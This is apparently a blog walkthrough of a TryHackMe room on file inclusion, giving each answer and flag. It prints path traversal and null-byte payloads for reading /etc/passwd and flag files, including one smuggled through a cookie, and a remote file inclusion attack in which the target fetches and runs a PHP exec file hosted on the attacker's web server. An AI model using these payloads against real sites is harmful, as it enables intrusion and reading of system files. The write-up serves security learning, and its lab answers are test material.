Welcome to this walkthrough of the File Inclusion room on TryHackMe. Remember that this post will contain the answers to the questions. I will try to explain every step the best i possibly can, but if you think I am missing something or just want to give me feedback, please leave a comment! Now let's get to the good stuff…

What function causes path traversal vulnerabilities in PHP? To answer this question, we simply have to read through the given text above the question and we will find out that the function that causes path traversal vulnerabilities in PHP is:

file_get_contents

To give a short explanation of path traversal; path traversal, or directory traversal, is when the application takes user input in a vulnerable function that allows the attacker to traverse the other directories of the server, outside of the application directory.

Give Lab #1 a try to read /etc/passwd. What would the request URI be?

When we access lab 1, we can see that we can include a file path. If we input the /etc/passwd as the question tells us to, the URI will be:

/lab1.php?file=/etc/passwd

In Lab #2, what is the directory specified in the include function?

To find out what directory is specified in the include function, we can give invalid input and make the application spit out an error, which will give us the necessary information. I gave aaa as input and got this error:

In first warning we can see the content of the include function, which is (includes/aaa, and this gives us the answer to our question:

includes

Give Lab #3 a try to read /etc/passwd. What is the request look like?

When we first input /etc/passwd , we can see that the application automatically appends .php at the end of our given file name. In the text before the question, we learn that adding a null byte, by using %00 or 0x00, ends the file name prematurely, if I can call it that, and then ignores the appended part. Example from TryHackMe:

This means that to read to /etc/passwd we have to traverse up in the directories by using ../ multiple times and then end the file path with a null byte %00 . Making the request look like this:

/lab3.php?file=../../../../etc/passwd%00

Which function is causing the directory traversal in Lab #4?

Again, by supplying invalid input, we get an error message that tells us exactly which function is being used.

file_get_contents

Try out Lab #6 and check what is the directory that has to be in the input field?

Using the same technique as before, with giving invalid input, we get another error message that helps us solve the challenge

THM-profile

Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

To read the /etc/os-release , first give THM-profile as the first directory, then traverse back again. Which will look something like this:

THM-profile/../../../../etc/os-release

This gives us some info about the operating system and the version we need:

12.04

Capture Flag1 at /etc/flag1

When we visit the first challenge, we are met with this message:

To "fix" this form and get the output we want, we can simply go into dev-tools and change the method of the form from GET to POST , then supply /etc/flag1 as input in the input field and we get the first flag:

F1x3d-iNpu7-f0rrn

Capture Flag2 at /etc/flag2

In the second challenge we are met with this message:

Taking a look at our cookies, we can see we have a cookie called THM with the value of Guest. If we change it to Admin and reload the page, we can see we have access to the page, but also a couple of errors:

Looks like the application takes the cookie as the file path, and appends .php to the end of the file path. So, to get our flag, we need to traverse up the directories, and add a null byte, all of this done as the value of the cookie, which will look like this:

../../../../etc/flag2%00

Giving us the flag:

c00k13_i5_yuMmy1

Capture Flag3 at /etc/flag3

In this challenge, when i first simply gave /etc/flag3 as input, it came back as this:

Here we can see that the / does not get included in the file path, and there is a .php appended at the end. Upon inspecting the website, I saw that the form was using the GET method. When I changed it to POST, and sent the request again, it included the /.

When I now tried to: use POST as the method of the form, add a null byte, and traverse up the directories, it still did not work. So, I put the request through burp, and saw that there is a cookie, from the previous challenge, and a token with the file path. I changed both to ../../../../etc/flag3%00

This finally gave me the answer to this question:

P0st_1s_w0rk1in9

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

To gain RCE with RFI, we have to host a malicious file on our own webserver, and then input the webserver IP and port, plus the file path to the malicious file.

First I created the malicious file with this command:

echo '<?php echo exec("hostname") ?>' > maliciousefile.php

Then I set up a HTTP webserver on my attackbox that could host the malicious file with this command:

python3 -m http.server — bind <ATTACKBOX-IP> <PORT>

Now that everything was ready to deliver the attack, I went back to the playground page and delivered this as the file:

http://10.10.98.195:9001/maliciousfile.php

This gave me the final answer in this room which is:

lfi-vm-thm-f8c5b1a78692

Thank you for taking the time to read this walkthrough. I hope you got something out of this, because I definitely did. As I said, if you have any feedback or comments, I will be more than happy to read them, so leave them down below! See you in the next one!